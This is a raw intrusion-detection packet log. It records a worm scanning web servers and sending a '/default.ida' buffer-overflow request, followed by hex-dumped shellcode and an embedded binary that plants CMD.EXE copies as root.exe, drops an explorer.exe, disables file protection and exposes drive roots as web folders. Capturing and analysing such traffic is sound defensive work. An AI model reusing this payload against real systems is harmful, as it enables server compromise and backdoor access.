No run mode specified, defaulting to verbose mode 09/17-22:25:01.673690 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:3701 -> 137.189.97.249:80 TCP TTL:122 TOS:0x0 ID:22102 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8246FF54 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:25:04.723903 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:3701 -> 137.189.97.249:80 TCP TTL:122 TOS:0x0 ID:22385 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8246FF54 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:25:09.315554 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:3701 -> 137.189.97.249:80 TCP TTL:122 TOS:0x0 ID:22882 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8246FF54 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:25:12.378993 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:4084 -> 137.189.98.84:80 TCP TTL:122 TOS:0x0 ID:23226 IpLen:20 DgmLen:48 DF ******S* Seq: 0x838B9A1A Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:25:14.617212 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:4084 -> 137.189.98.84:80 TCP TTL:122 TOS:0x0 ID:23475 IpLen:20 DgmLen:48 DF ******S* Seq: 0x838B9A1A Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:25:19.089876 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:4084 -> 137.189.98.84:80 TCP TTL:122 TOS:0x0 ID:23977 IpLen:20 DgmLen:48 DF ******S* Seq: 0x838B9A1A Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:03.977805 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:28116 IpLen:20 DgmLen:48 DF ******S* Seq: 0x88FE7064 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:06.939005 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:1821 -> 137.189.97.166:80 TCP TTL:122 TOS:0x0 ID:28391 IpLen:20 DgmLen:48 DF ******S* Seq: 0x894E9260 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:06.966861 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:28395 IpLen:20 DgmLen:48 DF ******S* Seq: 0x88FE7064 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:09.402015 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:1821 -> 137.189.97.166:80 TCP TTL:122 TOS:0x0 ID:28665 IpLen:20 DgmLen:48 DF ******S* Seq: 0x894E9260 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:11.406266 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C 202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:28891 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x88FE7065 Ack: 0xFAF596F6 Win: 0x2238 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:11.770137 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x5EA 202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:28892 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0x88FE7065 Ack: 0xFAF596F6 Win: 0x2238 TcpLen: 20 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 ?XXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 X%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078% 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F ype: text/xml.Co 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33 ntent-length: 33 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00 79 ........`.... 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00 ....dg.6..dg.&.. E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF .....h......\... 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40 P.U...\...P.U..@ 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00 .....X....U.=... 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6 ....=........... C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00 ...T....u..~0... 00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A ........F0...... 00 00 00 5F 5F 5F 5F 5F 5F 5F 5F 5F 00 8B 1C 24 ..._________...$ FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF C7 85 50 .U.f.....8.....P FE FF FF 01 00 00 00 6A 00 8D 85 50 FE FF FF 50 .......j...P...P 8D 85 38 FE FF FF 50 8B 45 08 FF 70 08 FF 90 84 ..8...P.E..p.... 00 00 00 80 BD 38 FE FF FF 01 74 68 53 FF 55 D4 .....8....thS.U. FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C 01 00 00 .U..E.i.T...,... 81 C7 2C 01 00 00 E8 D2 04 00 00 F7 D0 0F AF C7 ..,............. 89 46 34 8D 45 88 50 6A 00 FF 75 08 E8 05 00 00 .F4.E.Pj..u..... 00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0 50 FF 55 ......j.j..U.P.U D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE FF FF 00 .Ou..;...i.T.... 5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8 6A 00 6A \&....\&.W.U.j.j 16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46 34 29 45 ..U.j..U....F4)E 84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50 FF 55 C0 .jd.U...<...P.U. 0F B7 85 3C FE FF FF 3D D2 07 00 00 73 CF 0F B7 ...<...=....s... 85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85 70 FF FF .>......s.f..p.. FF 02 00 66 C7 85 72 FF FF FF 00 50 E8 64 04 00 ...f..r....P.d.. 00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02 FF 55 B8 ...t...j.j.j..U. 83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E 66 04 80 ...t..E.j.Th~f.. FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF FF FF 50 .u..U.Yj...p...P FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0 74 4B 33 .u..U........tK3 DB FF 55 94 3D 33 27 00 00 75 3F C7 85 68 FF FF ..U.=3'..u?..h.. FF 0A 00 00 00 C7 85 6C FF FF FF 00 00 00 00 C7 .......l........ 85 60 FF FF FF 01 00 00 00 8B 45 80 89 85 64 FF .`........E...d. FF FF 8D 85 68 FF FF FF 50 6A 00 8D 85 60 FF FF ....h...Pj...`.. FF 50 6A 00 6A 01 FF 55 A0 93 6A 00 54 68 7E 66 .Pj.j..U..j.Th~f 04 80 FF 75 80 FF 55 A4 59 83 FB 01 75 31 E8 00 ...u..U.Y...u1.. 00 00 00 58 2D D3 03 00 00 6A 00 68 EA 0E 00 00 ...X-....j.h.... 50 FF 75 80 FF 55 AC 3D EA 0E 00 00 75 11 6A 00 P.u..U.=....u.j. 6A 01 8D 85 5C FE FF FF 50 FF 75 80 FF 55 A8 FF j...\...P.u..U.. 75 80 FF 55 B4 E9 E7 FE FF FF BB 00 00 DF 77 81 u..U..........w. C3 00 00 01 00 81 FB 00 00 00 78 75 05 BB 00 00 ..........xu.... F0 BF 60 E8 0E 00 00 00 8B 64 24 08 64 67 8F 06 ..`......d$.dg.. 00 00 58 61 EB D9 64 67 FF 36 00 00 64 67 89 26 ..Xa..dg.6..dg.& 00 00 66 81 3B 4D 5A 75 E3 8B 4B 3C 81 3C 0B 50 ..f.;MZu..K<.<.P 45 00 00 75 D7 8B 54 0B 78 03 D3 8B 42 0C 81 3C E..u..T.x...B..< 03 4B 45 52 4E 75 C5 81 7C 03 04 45 4C 33 32 75 .KERNu..|..EL32u BB 33 C9 49 8B 72 20 03 F3 FC 41 AD 81 3C 03 47 .3.I.r ...A..<.G 65 74 50 75 F5 81 7C 03 04 72 6F 63 41 75 EB 03 etPu..|..rocAu.. 4A 10 49 D1 E1 03 4A 24 0F B7 0C 0B C1 E1 02 03 J.I...J$........ 4A 1C 8B 04 0B 03 C3 89 44 24 24 64 67 8F 06 00 J.......D$$dg... 00 58 61 C3 E8 51 FF FF FF 89 5D FC 89 45 F8 E8 .Xa..Q....]..E.. 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 ....LoadLibraryA 00 FF 75 FC FF 55 F8 89 45 F4 E8 0D 00 00 00 43 ..u..U..E......C 72 65 61 74 65 54 68 72 65 61 64 00 FF 75 FC FF reateThread..u.. 55 F8 89 45 F0 E8 0D 00 00 00 47 65 74 54 69 63 U..E......GetTic 6B 43 6F 75 6E 74 00 FF 75 FC FF 55 F8 89 45 EC kCount..u..U..E. E8 06 00 00 00 53 6C 65 65 70 00 FF 75 FC FF 55 .....Sleep..u..U F8 89 45 E8 E8 17 00 00 00 47 65 74 53 79 73 74 ..E......GetSyst 65 6D 44 65 66 61 75 6C 74 4C 61 6E 67 49 44 00 emDefaultLangID. FF 75 FC FF 55 F8 89 45 E4 E8 14 00 00 00 47 65 .u..U..E......Ge 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 tSystemDirectory 41 00 FF 75 FC FF 55 F8 89 45 E0 E8 0A 00 00 00 A..u..U..E...... 43 6F 70 79 46 69 6C 65 41 00 FF 75 FC FF 55 F8 CopyFileA..u..U. 89 45 DC E8 10 00 00 00 47 6C 6F 62 61 6C 46 69 .E......GlobalFi 6E 64 41 74 6F 6D 41 00 FF 75 FC FF 55 F8 89 45 ndAtomA..u..U..E D8 E8 0F 00 00 00 47 6C 6F 62 61 6C 41 64 64 41 ......GlobalAddA 74 6F 6D 41 tomA =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:12.091712 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x5EA 202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:28893 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0x88FE7619 Ack: 0xFAF596F6 Win: 0x2238 TcpLen: 20 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 ..E......_lcreat 00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F ..u..U..E......_ 6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 lwrite..u..U..E. E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC ....._lclose..u. FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 .U..E......GetSy 73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 stemTime..u..U.. 45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C E......WS2_32.DL 4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 L..U..E......soc 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 ket..u..U..E.... 00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 ..closesocket..u BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 ..U..E......ioct 6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 lsocket..u..U..E A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75 ......connect..u BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65 ..U..E......sele 63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00 ct..u..U..E..... 00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 .send..u..U..E.. 05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89 ....recv..u..U.. 45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61 E......gethostna 6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00 me..u..U..E..... 00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF .gethostbyname.. 75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 u..U..E......WSA 47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC GetLastError..u. FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 .U..E......USER3 32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 2.DLL..U..E..... 00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF .ExitWindowsEx.. 75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84 u..U..E...E.i... 08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1 ..@.E....xV4.... C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 ........<.t.<.t. C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 ................ E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 ................ E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF ......... ...... FF FF FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF ................ FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04 .............Y.. 81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F .#...#.X........ 74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 t....t.;.X...t.. 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D h......\...P.U.. BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD. 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj.... 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..d:\inetpub\scr 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe... 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 $....\...P.U.j.. 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C +...d:\progra~1\ 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C common~1\system\ 4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B MSADC\root.exe.. 0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA .$....\...P.U... 05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 ....MZP......... FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC ............@... 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C ...........PE..L 01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0 ....*%)......... 00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00 ................ 00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00 ............ ... 00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00 .@.............. 00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00 ............@... 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 ................ 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 ............... 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C ............0... 01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 ................ 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 .......... ..`.. 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04 ........... .... 00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10 ..@............. 00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00 ...0............ 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC ..........@..... FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68 ..........h....h D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE . @..a...... @.. 00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 . @.....j.h. @.. 4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31 L........h.'...1 01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A .....h.$@.h?...j 00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00 .h. @.h.....2... 0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68 ..u&j.hT @.j.j.h 48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF H @..5.$@....... 35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68 5.$@......h.$@.h 3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80 ?...j.hX @.h.... E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C .......uU.. @..L 00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68 ..... @..B...j.h B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 . @.j.j.h. @..5. 24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A $@......j.h. @.j 01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99 .j.h. @..5.$@... 00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 ....5.$@........ 05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0 ..$@.....h.$@.h. 20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40 @.h.$@.j.U.5.$@ 00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B ..`.....uI..$@.. C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81 .t@.. @..>.t6Ff. 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20 ~.,,u...217.... 40 00 89 35 @..5 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:15.371848 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C 202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:29148 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x88FE7BCD Ack: 0xFAF596F6 Win: 0x2238 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:15.545035 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3B8 202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:29150 IpLen:20 DgmLen:938 DF ***AP*** Seq: 0x88FE7BCD Ack: 0xFAF596F6 Win: 0x2238 TcpLen: 20 D0 24 40 00 FF 35 D0 24 40 00 68 D0 20 40 00 6A .$@..5.$@.h. @.j 01 6A 00 55 FF 35 D8 24 40 00 E8 19 00 00 00 C3 .j.U.5.$@....... FF 25 60 30 40 00 FF 25 64 30 40 00 FF 25 68 30 .%`0@..%d0@..%h0 40 00 FF 25 70 30 40 00 FF 25 74 30 40 00 FF 25 @..%p0@..%t0@..% 78 30 40 00 FF 25 7C 30 40 FC FC FC FC FC FC FC x0@..%|0@....... FC FC FC FC FC FC FC FC FC FC FC FC 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 5C 45 58 50 4C 4F 52 .........\EXPLOR 45 52 2E 45 58 45 00 00 00 53 4F 46 54 57 41 52 ER.EXE...SOFTWAR 45 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 E\Microsoft\Wind 6F 77 73 20 4E 54 5C 43 75 72 72 65 6E 74 56 65 ows NT\CurrentVe 72 73 69 6F 6E 5C 57 69 6E 6C 6F 67 6F 6E 00 00 rsion\Winlogon.. 00 53 46 43 44 69 73 61 62 6C 65 00 00 9D FF FF .SFCDisable..... FF 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 .SYSTEM\CurrentC 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 ontrolSet\Servic 65 73 5C 57 33 53 56 43 5C 50 61 72 61 6D 65 74 es\W3SVC\Paramet 65 72 73 5C 56 69 72 74 75 61 6C 20 52 6F 6F 74 ers\Virtual Root 73 00 00 00 00 2F 53 63 72 69 70 74 73 00 00 00 s..../Scripts... 00 2F 4D 53 41 44 43 00 00 2F 43 00 00 2F 44 00 ./MSADC../C../D. 00 63 3A 5C 2C 2C 32 31 37 00 00 00 00 64 3A 5C .c:\,,217....d:\ 2C 2C 32 31 37 FC FC FC FC FC FC FC FC FC FC FC ,,217........... FC FC FC FC FC FC FC FC FC FC FC FC FC FC 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 3C 30 00 00 00 00 00 00 00 00 00 00 84 30 ..<0...........0 00 00 60 30 00 00 4C 30 00 00 00 00 00 00 00 00 ..`0..L0........ 00 00 91 30 00 00 70 30 00 00 00 00 00 00 00 00 ...0..p0........ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9E 30 ...............0 00 00 A6 30 00 00 BE 30 00 00 00 00 00 00 C8 30 ...0...0.......0 00 00 DC 30 00 00 EE 30 00 00 FE 30 00 00 00 00 ...0...0...0.... 00 00 9E 30 00 00 A6 30 00 00 BE 30 00 00 00 00 ...0...0...0.... 00 00 C8 30 00 00 DC 30 00 00 EE 30 00 00 FE 30 ...0...0...0...0 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 ......KERNEL32.d 6C 6C 00 41 44 56 41 50 49 33 32 2E 64 6C 6C 00 ll.ADVAPI32.dll. 00 00 53 6C 65 65 70 00 00 00 47 65 74 57 69 6E ..Sleep...GetWin 64 6F 77 73 44 69 72 65 63 74 6F 72 79 41 00 00 dowsDirectoryA.. 00 00 57 69 6E 45 78 65 63 00 00 00 52 65 67 51 ..WinExec...RegQ 75 65 72 79 56 61 6C 75 65 45 78 41 00 00 00 00 ueryValueExA.... 52 65 67 53 65 74 56 61 6C 75 65 45 78 41 00 00 RegSetValueExA.. 00 00 52 65 67 4F 70 65 6E 4B 65 79 45 78 41 00 ..RegOpenKeyExA. 00 00 52 65 67 43 6C 6F 73 65 4B 65 79 FC FC FC ..RegCloseKey... FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 5E BF B9 05 00 00 6A .........^.....j 07 E8 10 00 00 00 64 3A 5C 65 78 70 6C 6F 72 65 ......d:\explore 72 2E 65 78 65 00 8B 04 24 88 18 FF 55 CC 83 F8 r.exe...$...U... FF 74 4D 89 85 4C FE FF FF AC 8A F8 38 3E 75 27 .tM..L......8>u' 6A 20 E8 23 00 00 00 00 00 00 00 00 00 00 00 00 j .#............ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 6A 01 56 FF B5 4C FE FF FF .......j.V..L... FF 55 C8 46 4F 75 C5 FF B5 4C FE FF FF FF 55 C4 .U.FOu...L....U. FE C3 80 FB 64 0F 86 4C F9 FF FF C3 61 C9 C2 04 ....d..L....a... 00 90 .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:15.925794 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:1821 -> 137.189.97.166:80 TCP TTL:122 TOS:0x0 ID:29191 IpLen:20 DgmLen:48 DF ******S* Seq: 0x894E9260 Ack: 0x0 Win: 0x2238 TcpLen: 28 